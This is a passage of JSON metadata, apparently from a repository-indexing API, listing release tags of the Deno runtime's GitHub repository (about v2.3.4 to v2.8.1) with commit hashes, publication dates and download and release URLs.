ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","h